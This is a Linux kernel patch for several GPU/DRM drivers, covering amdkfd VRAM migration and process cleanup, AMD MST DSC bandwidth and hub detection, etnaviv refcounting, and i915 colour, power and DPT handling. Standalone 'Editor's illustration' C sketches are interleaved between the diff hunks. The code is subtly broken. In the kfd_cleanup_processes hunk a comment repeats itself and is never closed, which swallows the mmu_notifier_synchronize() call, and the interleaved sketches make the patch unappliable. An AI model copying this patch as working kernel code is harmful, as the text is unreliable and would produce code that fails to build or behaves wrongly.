+@@ -457,7 +451,7 @@ svm_migrate_vma_to_vram(struct amdgpu_device *adev, struct svm_range *prange,
+ 	else
+ 		pr_debug("0x%lx pages migrated\n", cpages);
+ 
+-	r = svm_migrate_copy_to_vram(adev, prange, &migrate, &mfence, scratch);
++	r = svm_migrate_copy_to_vram(adev, prange, &migrate, &mfence, scratch, ttm_res_offset);
+ 	migrate_vma_pages(&migrate);
+ 
+ 	pr_debug("successful/cpages/npages 0x%lx/0x%lx/0x%lx\n",
+@@ -505,6 +499,7 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 	unsigned long addr, start, end;
+ 	struct vm_area_struct *vma;
+ 	struct amdgpu_device *adev;
++	uint64_t ttm_res_offset;
+ 	unsigned long cpages = 0;
+ 	long r = 0;
+ 
+@@ -526,6 +521,13 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 	start = prange->start << PAGE_SHIFT;
+ 	end = (prange->last + 1) << PAGE_SHIFT;
+ 
++	r = svm_range_vram_node_new(adev, prange, true);
++	if (r) {
++		dev_dbg(adev->dev, "fail %ld to alloc vram\n", r);
++		return r;
++	}
++	ttm_res_offset = prange->offset << PAGE_SHIFT;
++
+ 	for (addr = start; addr < end;) {
+ 		unsigned long next;
+ 
+@@ -534,18 +536,21 @@ svm_migrate_ram_to_vram(struct svm_range *prange, uint32_t best_loc,
+ 			break;
+ 
+ 		next = min(vma->vm_end, end);
+-		r = svm_migrate_vma_to_vram(adev, prange, vma, addr, next, trigger);
++		r = svm_migrate_vma_to_vram(adev, prange, vma, addr, next, trigger, ttm_res_offset);
+ 		if (r < 0) {
+ 			pr_debug("failed %ld to migrate\n", r);
+ 			break;
+ 		} else {
+ 			cpages += r;
+ 		}
++		ttm_res_offset += next - addr;
+ 		addr = next;
+ 	}
+ 
+ 	if (cpages)
+ 		prange->actual_loc = best_loc;
++	else
++		svm_range_vram_node_free(prange);
+ 
+ 	return r < 0 ? r : 0;
+ }
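
[Editor's illustration] The migrate fix allocates the VRAM node once per range and then advances ttm_res_offset by the size of each migrated chunk, so successive VMAs land at successive VRAM offsets instead of all starting at prange->offset. A standalone sketch of the offset walk, assuming 4 KiB pages and made-up chunk boundaries:

#include <stdio.h>
#include <stdint.h>

#define PAGE_SHIFT 12

/* Walk [start, end) in arbitrary chunks (standing in for VMAs) and show
 * how the destination offset advances with each migrated chunk. */
static void migrate_range(uint64_t start, uint64_t end, uint64_t base_pages)
{
	uint64_t offset = base_pages << PAGE_SHIFT;
	uint64_t addr = start;

	while (addr < end) {
		uint64_t next = addr + (1 << PAGE_SHIFT) * 4;	/* fake VMA */

		if (next > end)
			next = end;
		printf("copy [%#llx, %#llx) -> vram offset %#llx\n",
		       (unsigned long long)addr, (unsigned long long)next,
		       (unsigned long long)offset);
		offset += next - addr;	/* the fix: advance per chunk */
		addr = next;
	}
}

int main(void)
{
	migrate_range(0x100000, 0x10a000, 2);
	return 0;
}
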
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_module.c b/drivers/gpu/drm/amd/amdkfd/kfd_module.c
+index 09b966dc37681..aee2212e52f69 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_module.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_module.c
+@@ -77,6 +77,7 @@ err_ioctl:
+ 
+ static void kfd_exit(void)
+ {
++	kfd_cleanup_processes();
+ 	kfd_debugfs_fini();
+ 	kfd_process_destroy_wq();
+ 	kfd_procfs_shutdown();
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+index bf610e3b683bb..6d6588b9beed7 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_priv.h
+@@ -928,6 +928,7 @@ bool kfd_dev_is_large_bar(struct kfd_dev *dev);
+ 
+ int kfd_process_create_wq(void);
+ void kfd_process_destroy_wq(void);
++void kfd_cleanup_processes(void);
+ struct kfd_process *kfd_create_process(struct file *filep);
+ struct kfd_process *kfd_get_process(const struct task_struct *task);
+ struct kfd_process *kfd_lookup_process_by_pasid(u32 pasid);
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process.c b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+index dd351105c1bcf..7f68d51541e8e 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process.c
+@@ -1167,6 +1167,17 @@ static void kfd_process_free_notifier(struct mmu_notifier *mn)
+ 	kfd_unref_process(container_of(mn, struct kfd_process, mmu_notifier));
+ }
+ 
++static void kfd_process_notifier_release_internal(struct kfd_process *p)
++{
++	cancel_delayed_work_sync(&p->eviction_work);
++	cancel_delayed_work_sync(&p->restore_work);
++
++	/* Indicate to other users that MM is no longer valid */
++	p->mm = NULL;
++
++	mmu_notifier_put(&p->mmu_notifier);
++}
++
+ static void kfd_process_notifier_release(struct mmu_notifier *mn,
+ 					struct mm_struct *mm)
+ {
+@@ -1181,17 +1192,22 @@ static void kfd_process_notifier_release(struct mmu_notifier *mn,
+ 		return;
+ 
+ 	mutex_lock(&kfd_processes_mutex);
++	/*
++	 * Return early if the table is empty.
++	 *
++	 * This can happen if this function is called concurrently from
++	 * the mmu_notifier and from kfd_cleanup_processes().
++	 */
++	if (hash_empty(kfd_processes_table)) {
++		mutex_unlock(&kfd_processes_mutex);
++		return;
++	}
+ 	hash_del_rcu(&p->kfd_processes);
+ 	mutex_unlock(&kfd_processes_mutex);
+ 	synchronize_srcu(&kfd_processes_srcu);
+ 
+-	cancel_delayed_work_sync(&p->eviction_work);
+-	cancel_delayed_work_sync(&p->restore_work);
+-
+-	/* Indicate to other users that MM is no longer valid */
+-	p->mm = NULL;
+-
+-	mmu_notifier_put(&p->mmu_notifier);
++	kfd_process_notifier_release_internal(p);
+ }
+ 
+ static const struct mmu_notifier_ops kfd_process_mmu_notifier_ops = {
+@@ -1200,6 +1216,43 @@ static const struct mmu_notifier_ops kfd_process_mmu_notifier_ops = {
+ 	.free_notifier = kfd_process_free_notifier,
+ };
+ 
++/*
++ * This handles the case where the driver is unloaded before all
++ * mm_structs are released. We need to safely free the kfd_process
++ * structures and avoid racing with the mmu_notifier, which might also
++ * try to free them.
++ */
++void kfd_cleanup_processes(void)
++{
++	struct kfd_process *p;
++	struct hlist_node *p_temp;
++	unsigned int temp;
++	HLIST_HEAD(cleanup_list);
++
++	/*
++	 * Move every remaining kfd_process from the process table to a
++	 * temporary list for processing. Once done, the mmu_notifier
++	 * release callback will not find the kfd_process in the table
++	 * and will return early, avoiding a double free.
++	 */
++	mutex_lock(&kfd_processes_mutex);
++	hash_for_each_safe(kfd_processes_table, temp, p_temp, p, kfd_processes) {
++		hash_del_rcu(&p->kfd_processes);
++		synchronize_srcu(&kfd_processes_srcu);
++		hlist_add_head(&p->kfd_processes, &cleanup_list);
++	}
++	mutex_unlock(&kfd_processes_mutex);
++
++	hlist_for_each_entry_safe(p, p_temp, &cleanup_list, kfd_processes)
++		kfd_process_notifier_release_internal(p);
++
++	/*
++	 * Ensures that all outstanding free_notifier get called, triggering
++	 * Ensure that all outstanding free_notifier callbacks run,
++	 * triggering the release of the kfd_process structs.
++	mmu_notifier_synchronize();
++}
++
+ static int kfd_process_init_cwsr_apu(struct kfd_process *p, struct file *filep)
+ {
+ 	unsigned long  offset;
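
[Editor's illustration] kfd_cleanup_processes() relies on ordering: entries leave the shared table (under the mutex, with an SRCU grace period) before anything is released, so a racing notifier finds an empty table and returns early. A simplified single-threaded sketch of that move-then-release pattern; the list and names are illustrative, not the kernel's hashtable API:

#include <stdio.h>
#include <stdlib.h>

struct process {
	int pid;
	struct process *next;
};

static struct process *table;	/* stands in for kfd_processes_table */

static void table_add(int pid)
{
	struct process *p = malloc(sizeof(*p));

	p->pid = pid;
	p->next = table;
	table = p;
}

static void release(struct process *p)
{
	printf("releasing pid %d\n", p->pid);
	free(p);
}

/* Mirror of the patch's ordering: unlink everything from the shared
 * table first (under the real code's mutex plus SRCU sync), so a racing
 * notifier sees an empty table and returns early; only then release. */
static void cleanup(void)
{
	struct process *cleanup_list = table, *p, *tmp;

	table = NULL;	/* racing lookups now find nothing */

	for (p = cleanup_list; p; p = tmp) {
		tmp = p->next;
		release(p);
	}
}

int main(void)
{
	table_add(1);
	table_add(2);
	cleanup();
	return 0;
}
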
+diff --git a/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c b/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
+index 5137476ec18e6..4236539d9f932 100644
+--- a/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
++++ b/drivers/gpu/drm/amd/amdkfd/kfd_process_queue_manager.c
+@@ -218,8 +218,8 @@ static int init_user_queue(struct process_queue_manager *pqm,
+ 	return 0;
+ 
+ cleanup:
+-	if (dev->shared_resources.enable_mes)
+-		uninit_queue(*q);
++	uninit_queue(*q);
++	*q = NULL;
+ 	return retval;
+ }
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+index 8561e9b017a2e..df74bc88e4600 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.c
+@@ -208,6 +208,21 @@ bool needs_dsc_aux_workaround(struct dc_link *link)
+ 	return false;
+ }
+ 
++bool is_synaptics_cascaded_panamera(struct dc_link *link, struct drm_dp_mst_port *port)
++{
++	u8 branch_vendor_data[4] = { 0 }; // Vendor data 0x50C ~ 0x50F
++
++	if (drm_dp_dpcd_read(port->mgr->aux, DP_BRANCH_VENDOR_SPECIFIC_START, &branch_vendor_data, 4) == 4) {
++		if (link->dpcd_caps.branch_dev_id == DP_BRANCH_DEVICE_ID_90CC24 &&
++				IS_SYNAPTICS_CASCADED_PANAMERA(link->dpcd_caps.branch_dev_name, branch_vendor_data)) {
++			DRM_INFO("Synaptics Cascaded MST hub\n");
++			return true;
++		}
++	}
++
++	return false;
++}
++
+ static bool validate_dsc_caps_on_connector(struct amdgpu_dm_connector *aconnector)
+ {
+ 	struct dc_sink *dc_sink = aconnector->dc_sink;
+@@ -231,6 +246,10 @@ static bool validate_dsc_caps_on_connector(struct amdgpu_dm_connector *aconnecto
+ 	    needs_dsc_aux_workaround(aconnector->dc_link))
+ 		aconnector->dsc_aux = &aconnector->mst_port->dm_dp_aux.aux;
+ 
++	/* synaptics cascaded MST hub case */
++	if (!aconnector->dsc_aux && is_synaptics_cascaded_panamera(aconnector->dc_link, port))
++		aconnector->dsc_aux = port->mgr->aux;
++
+ 	if (!aconnector->dsc_aux)
+ 		return false;
+ 
+@@ -627,12 +646,25 @@ struct dsc_mst_fairness_params {
+ 	struct amdgpu_dm_connector *aconnector;
+ };
+ 
+-static int kbps_to_peak_pbn(int kbps)
++static uint16_t get_fec_overhead_multiplier(struct dc_link *dc_link)
++{
++	u8 link_coding_cap;
++	uint16_t fec_overhead_multiplier_x1000 = PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B;
++
++	link_coding_cap = dc_link_dp_mst_decide_link_encoding_format(dc_link);
++	if (link_coding_cap == DP_128b_132b_ENCODING)
++		fec_overhead_multiplier_x1000 = PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B;
++
++	return fec_overhead_multiplier_x1000;
++}
++
++static int kbps_to_peak_pbn(int kbps, uint16_t fec_overhead_multiplier_x1000)
+ {
+ 	u64 peak_kbps = kbps;
+ 
+ 	peak_kbps *= 1006;
+-	peak_kbps = div_u64(peak_kbps, 1000);
++	peak_kbps *= fec_overhead_multiplier_x1000;
++	peak_kbps = div_u64(peak_kbps, 1000 * 1000);
+ 	return (int) DIV64_U64_ROUND_UP(peak_kbps * 64, (54 * 8 * 1000));
+ }
+ 
+@@ -719,11 +751,12 @@ static int increase_dsc_bpp(struct drm_atomic_state *state,
+ 	int link_timeslots_used;
+ 	int fair_pbn_alloc;
+ 	int ret = 0;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	for (i = 0; i < count; i++) {
+ 		if (vars[i + k].dsc_enabled) {
+ 			initial_slack[i] =
+-			kbps_to_peak_pbn(params[i].bw_range.max_kbps) - vars[i + k].pbn;
++			kbps_to_peak_pbn(params[i].bw_range.max_kbps, fec_overhead_multiplier_x1000) - vars[i + k].pbn;
+ 			bpp_increased[i] = false;
+ 			remaining_to_increase += 1;
+ 		} else {
+@@ -819,6 +852,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 	int next_index;
+ 	int remaining_to_try = 0;
+ 	int ret;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	for (i = 0; i < count; i++) {
+ 		if (vars[i + k].dsc_enabled
+@@ -848,7 +882,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 		if (next_index == -1)
+ 			break;
+ 
+-		vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.stream_kbps);
++		vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 		ret = drm_dp_atomic_find_time_slots(state,
+ 						    params[next_index].port->mgr,
+ 						    params[next_index].port,
+@@ -861,7 +895,7 @@ static int try_disable_dsc(struct drm_atomic_state *state,
+ 			vars[next_index].dsc_enabled = false;
+ 			vars[next_index].bpp_x16 = 0;
+ 		} else {
+-			vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.max_kbps);
++			vars[next_index].pbn = kbps_to_peak_pbn(params[next_index].bw_range.max_kbps, fec_overhead_multiplier_x1000);
+ 			ret = drm_dp_atomic_find_time_slots(state,
+ 							    params[next_index].port->mgr,
+ 							    params[next_index].port,
+@@ -890,6 +924,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	int count = 0;
+ 	int i, k, ret;
+ 	bool debugfs_overwrite = false;
++	uint16_t fec_overhead_multiplier_x1000 = get_fec_overhead_multiplier(dc_link);
+ 
+ 	memset(params, 0, sizeof(params));
+ 
+@@ -951,7 +986,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	/* Try no compression */
+ 	for (i = 0; i < count; i++) {
+ 		vars[i + k].aconnector = params[i].aconnector;
+-		vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps);
++		vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 		vars[i + k].dsc_enabled = false;
+ 		vars[i + k].bpp_x16 = 0;
+ 		ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr, params[i].port,
+@@ -970,7 +1005,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 	/* Try max compression */
+ 	for (i = 0; i < count; i++) {
+ 		if (params[i].compression_possible && params[i].clock_force_enable != DSC_CLK_FORCE_DISABLE) {
+-			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.min_kbps);
++			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.min_kbps, fec_overhead_multiplier_x1000);
+ 			vars[i + k].dsc_enabled = true;
+ 			vars[i + k].bpp_x16 = params[i].bw_range.min_target_bpp_x16;
+ 			ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr,
+@@ -978,7 +1013,7 @@ static int compute_mst_dsc_configs_for_link(struct drm_atomic_state *state,
+ 			if (ret < 0)
+ 				return ret;
+ 		} else {
+-			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps);
++			vars[i + k].pbn = kbps_to_peak_pbn(params[i].bw_range.stream_kbps, fec_overhead_multiplier_x1000);
+ 			vars[i + k].dsc_enabled = false;
+ 			vars[i + k].bpp_x16 = 0;
+ 			ret = drm_dp_atomic_find_time_slots(state, params[i].port->mgr,
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+index 97fd70df531bf..1e4ede1e57abd 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm_mst_types.h
+@@ -34,6 +34,21 @@
+ #define SYNAPTICS_RC_OFFSET        0x4BC
+ #define SYNAPTICS_RC_DATA          0x4C0
+ 
++#define DP_BRANCH_VENDOR_SPECIFIC_START 0x50C
++
++/**
++ * Panamera MST Hub detection
++ * DPCD offset 050Eh == 0x5A indicates the cascaded MST hub case.
++ * The read starts at the branch device vendor specific field (050Ch).
++ */
++#define IS_SYNAPTICS_PANAMERA(branchDevName) (((int)branchDevName[4] & 0xF0) == 0x50 ? 1 : 0)
++#define BRANCH_HW_REVISION_PANAMERA_A2 0x10
++#define SYNAPTICS_CASCADED_HUB_ID  0x5A
++#define IS_SYNAPTICS_CASCADED_PANAMERA(devName, data) ((IS_SYNAPTICS_PANAMERA(devName) && ((int)data[2] == SYNAPTICS_CASCADED_HUB_ID)) ? 1 : 0)
++
++#define PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B	1031
++#define PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B	1000
++
+ struct amdgpu_display_manager;
+ struct amdgpu_dm_connector;
+ 
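
[Editor's illustration] With the new multiplier folded in, the PBN math above becomes peak_kbps = kbps * 1006/1000 * fec_x1000/1000, rounded up into 54/64 MBps PBN units. A standalone rendering of that arithmetic, with the multiplier constants copied from the header hunk and an example bitrate picked purely for illustration:

#include <stdio.h>
#include <stdint.h>

#define PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B	1031
#define PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B	1000

static int kbps_to_peak_pbn(int kbps, uint16_t fec_x1000)
{
	uint64_t peak_kbps = (uint64_t)kbps;

	peak_kbps *= 1006;		/* 0.6% margin, as in the hunk */
	peak_kbps *= fec_x1000;		/* FEC overhead, x1000 fixed point */
	peak_kbps /= 1000 * 1000;
	/* PBN unit is 54/64 MBps; round up like DIV64_U64_ROUND_UP. */
	return (int)((peak_kbps * 64 + (54 * 8 * 1000) - 1) / (54 * 8 * 1000));
}

int main(void)
{
	int kbps = 8100000;	/* example: ~8.1 Gbps stream payload */

	printf("8b/10b:    %d PBN\n",
	       kbps_to_peak_pbn(kbps, PBN_FEC_OVERHEAD_MULTIPLIER_8B_10B));
	printf("128b/132b: %d PBN\n",
	       kbps_to_peak_pbn(kbps, PBN_FEC_OVERHEAD_MULTIPLIER_128B_132B));
	return 0;
}
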
+diff --git a/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c b/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
+index 3fa2da1496398..fc594ea5bbc1d 100644
+--- a/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
++++ b/drivers/gpu/drm/etnaviv/etnaviv_gem_prime.c
+@@ -91,7 +91,15 @@ static void *etnaviv_gem_prime_vmap_impl(struct etnaviv_gem_object *etnaviv_obj)
+ static int etnaviv_gem_prime_mmap_obj(struct etnaviv_gem_object *etnaviv_obj,
+ 		struct vm_area_struct *vma)
+ {
+-	return dma_buf_mmap(etnaviv_obj->base.dma_buf, vma, 0);
++	int ret;
++
++	ret = dma_buf_mmap(etnaviv_obj->base.dma_buf, vma, 0);
++	if (!ret) {
++		/* Drop the reference acquired by drm_gem_mmap_obj(). */
++		drm_gem_object_put(&etnaviv_obj->base);
++	}
++
++	return ret;
+ }
+ 
+ static const struct etnaviv_gem_ops etnaviv_gem_prime_ops = {
+diff --git a/drivers/gpu/drm/i915/display/intel_color.c b/drivers/gpu/drm/i915/display/intel_color.c
+index 6bda4274eae92..c85757f55112b 100644
+--- a/drivers/gpu/drm/i915/display/intel_color.c
++++ b/drivers/gpu/drm/i915/display/intel_color.c
+@@ -499,6 +499,22 @@ static void icl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ 	icl_load_csc_matrix(crtc_state);
+ }
+ 
++static void skl_color_commit_noarm(const struct intel_crtc_state *crtc_state)
++{
++	/*
++	 * Possibly related to display WA #1184, SKL CSC loses the latched
++	 * CSC coeff/offset register values if the CSC registers are disarmed
++	 * between DC5 exit and PSR exit. This will cause the plane(s) to
++	 * output all black (until CSC_MODE is rearmed and properly latched).
++	 * Once PSR exit (and proper register latching) has occurred the
++	 * danger is over. Thus when PSR is enabled the CSC coeff/offset
++	 * register programming will be performed from skl_color_commit_arm()
++	 * which is called after PSR exit.
++	 */
++	if (!crtc_state->has_psr)
++		ilk_load_csc_matrix(crtc_state);
++}
++
+ static void ilk_color_commit_noarm(const struct intel_crtc_state *crtc_state)
+ {
+ 	ilk_load_csc_matrix(crtc_state);
+@@ -541,6 +557,9 @@ static void skl_color_commit_arm(const struct intel_crtc_state *crtc_state)
+ 	enum pipe pipe = crtc->pipe;
+ 	u32 val = 0;
+ 
++	if (crtc_state->has_psr)
++		ilk_load_csc_matrix(crtc_state);
++
+ 	/*
+ 	 * We don't (yet) allow userspace to control the pipe background color,
+ 	 * so force it to black, but apply pipe gamma and CSC appropriately
+@@ -2171,7 +2190,7 @@ static const struct intel_color_funcs icl_color_funcs = {
+ 
+ static const struct intel_color_funcs glk_color_funcs = {
+ 	.color_check = glk_color_check,
+-	.color_commit_noarm = ilk_color_commit_noarm,
++	.color_commit_noarm = skl_color_commit_noarm,
+ 	.color_commit_arm = skl_color_commit_arm,
+ 	.load_luts = glk_load_luts,
+ 	.read_luts = glk_read_luts,
+@@ -2179,7 +2198,7 @@ static const struct intel_color_funcs glk_color_funcs = {
+ 
+ static const struct intel_color_funcs skl_color_funcs = {
+ 	.color_check = ivb_color_check,
+-	.color_commit_noarm = ilk_color_commit_noarm,
++	.color_commit_noarm = skl_color_commit_noarm,
+ 	.color_commit_arm = skl_color_commit_arm,
+ 	.load_luts = bdw_load_luts,
+ 	.read_luts = NULL,
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index e0d36edd1e3fb..3f3982ae9974b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -7124,6 +7124,8 @@ static void intel_update_crtc(struct intel_atomic_state *state,
+ 
+ 	intel_fbc_update(state, crtc);
+ 
++	drm_WARN_ON(&i915->drm, !intel_display_power_is_enabled(i915, POWER_DOMAIN_DC_OFF));
++
+ 	if (!modeset &&
+ 	    (new_crtc_state->uapi.color_mgmt_changed ||
+ 	     new_crtc_state->update_pipe))
+@@ -7500,8 +7502,28 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 	drm_atomic_helper_wait_for_dependencies(&state->base);
+ 	drm_dp_mst_atomic_wait_for_dependencies(&state->base);
+ 
+-	if (state->modeset)
+-		wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_MODESET);
++	/*
++	 * During full modesets we write a lot of registers, wait
++	 * for PLLs, etc. Doing that while DC states are enabled
++	 * is not a good idea.
++	 *
++	 * During fastsets and other updates we also need to
++	 * disable DC states due to the following scenario:
++	 * 1. DC5 exit and PSR exit happen
++	 * 2. Some or all _noarm() registers are written
++	 * 3. Due to some long delay PSR is re-entered
++	 * 4. DC5 entry -> DMC saves the already written new
++	 *    _noarm() registers and the old not yet written
++	 *    _arm() registers
++	 * 5. DC5 exit -> DMC restores a mixture of old and
++	 *    new register values and arms the update
++	 * 6. PSR exit -> hardware latches a mixture of old and
++	 *    new register values -> corrupted frame, or worse
++	 * 7. New _arm() registers are finally written
++	 * 8. Hardware finally latches a complete set of new
++	 *    register values, and subsequent frames will be OK again
++	 */
++	wakeref = intel_display_power_get(dev_priv, POWER_DOMAIN_DC_OFF);
+ 
+ 	intel_atomic_prepare_plane_clear_colors(state);
+ 
+@@ -7640,8 +7662,8 @@ static void intel_atomic_commit_tail(struct intel_atomic_state *state)
+ 		 * the culprit.
+ 		 */
+ 		intel_uncore_arm_unclaimed_mmio_detection(&dev_priv->uncore);
+-		intel_display_power_put(dev_priv, POWER_DOMAIN_MODESET, wakeref);
+ 	}
++	intel_display_power_put(dev_priv, POWER_DOMAIN_DC_OFF, wakeref);
+ 	intel_runtime_pm_put(&dev_priv->runtime_pm, state->wakeref);
+ 
+ 	/*
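
[Editor's illustration] The commit-tail change holds POWER_DOMAIN_DC_OFF across the entire update, not just full modesets, so the _noarm()/_arm() sequence in the comment above can never be split by a DC5 save/restore. A toy sketch of the get/put bracketing; the functions are stand-ins, not the i915 API:

#include <stdio.h>
#include <stdbool.h>

static bool dc_off_held;

/* Stand-ins for intel_display_power_get()/_put(POWER_DOMAIN_DC_OFF). */
static int power_get_dc_off(void)     { dc_off_held = true;  return 1; }
static void power_put_dc_off(int ref) { (void)ref; dc_off_held = false; }

static void write_noarm_regs(void) { printf("noarm writes (DC off held: %d)\n", dc_off_held); }
static void write_arm_regs(void)   { printf("arm writes   (DC off held: %d)\n", dc_off_held); }

static void commit_tail(void)
{
	/* Hold the reference across the whole update so DMC cannot
	 * save/restore a half-written register set in between. */
	int wakeref = power_get_dc_off();

	write_noarm_regs();
	write_arm_regs();

	power_put_dc_off(wakeref);
}

int main(void)
{
	commit_tail();
	return 0;
}
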
+diff --git a/drivers/gpu/drm/i915/display/intel_dpt.c b/drivers/gpu/drm/i915/display/intel_dpt.c
+index ac587647e1f50..a3893aff38611 100644
+--- a/drivers/gpu/drm/i915/display/intel_dpt.c
++++ b/drivers/gpu/drm/i915/display/intel_dpt.c
+@@ -300,6 +300,7 @@ intel_dpt_create(struct intel_framebuffer *fb)
+ 	vm->pte_encode = gen8_ggtt_pte_encode;
+ 
+ 	dpt->obj = dpt_obj;
++	dpt->obj->is_dpt = true;
+ 
+ 	return &dpt->vm;
+ }
+@@ -308,5 +309,6 @@ void intel_dpt_destroy(struct i915_address_space *vm)
+ {
+ 	struct i915_dpt *dpt = i915_vm_to_dpt(vm);
+ 
++	dpt->obj->is_dpt = false;
+ 	i915_vm_put(&dpt->vm);
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_tc.c b/drivers/gpu/drm/i915/display/intel_tc.c
+index e5af955b5600f..8d6dac32c8960 100644
+--- a/drivers/gpu/drm/i915/display/intel_tc.c
++++ b/drivers/gpu/drm/i915/display/intel_tc.c
+@@ -440,9 +440,9 @@ static bool icl_tc_phy_is_owned(struct intel_digital_port *dig_port)
+ 				PORT_TX_DFLEXDPCSSS(dig_port->tc_phy_fia));
+ 	if (val == 0xffffffff) {
+ 		drm_dbg_kms(&i915->drm,
+-			    "Port %s: PHY in TCCOLD, assume safe mode\n",
++			    "Port %s: PHY in TCCOLD, assume not owned\n",
+ 			    dig_port->tc_port_name);
+-		return true;
++		return false;
+ 	}
+ 
+ 	return val & DP_PHY_MODE_STATUS_NOT_SAFE(dig_port->tc_phy_fia_idx);
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_lmem.c b/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
+index 8949fb0a944f6..3198b64ad7dbc 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
++++ b/drivers/gpu/drm/i915/gem/i915_gem_lmem.c
+@@ -127,7 +127,8 @@ i915_gem_object_create_lmem_from_data(struct drm_i915_private *i915,
+ 
+ 	memcpy(map, data, size);
+ 
+-	i915_gem_object_unpin_map(obj);
++	i915_gem_object_flush_map(obj);
++	__i915_gem_object_release_map(obj);
+ 
+ 	return obj;
+ }
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object.h b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+index 1723af9b0f6a2..ea951e2f55b17 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object.h
+@@ -319,7 +319,7 @@ i915_gem_object_never_mmap(const struct drm_i915_gem_object *obj)
+ static inline bool
+ i915_gem_object_is_framebuffer(const struct drm_i915_gem_object *obj)
+ {
+-	return READ_ONCE(obj->frontbuffer);
++	return READ_ONCE(obj->frontbuffer) || obj->is_dpt;
+ }
+ 
+ static inline unsigned int
+diff --git a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+index ab4c2f90a5643..1d0d8ee9d707d 100644
+--- a/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
++++ b/drivers/gpu/drm/i915/gem/i915_gem_object_types.h
+@@ -491,6 +491,9 @@ struct drm_i915_gem_object {
+ 	 */
+ 	unsigned int cache_dirty:1;
+ 
++	/* @is_dpt: Object houses a display page table (DPT) */
++	unsigned int is_dpt:1;
++
+ 	/**
+ 	 * @read_domains: Read memory domains.
+ 	 *
+diff --git a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+index 41c93a18d5cb3..32a3c42ec45b1 100644
+--- a/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
++++ b/drivers/gpu/drm/msm/disp/dpu1/dpu_hw_catalog.c
+@@ -356,7 +356,7 @@ static const struct dpu_caps sc8180x_dpu_caps = {
+ static const struct dpu_caps sm8250_dpu_caps = {
+ 	.max_mixer_width = DEFAULT_DPU_OUTPUT_LINE_WIDTH,
+ 	.max_mixer_blendstages = 0xb,
+-	.qseed_type = DPU_SSPP_SCALER_QSEED3LITE,
++	.qseed_type = DPU_SSPP_SCALER_QSEED4,
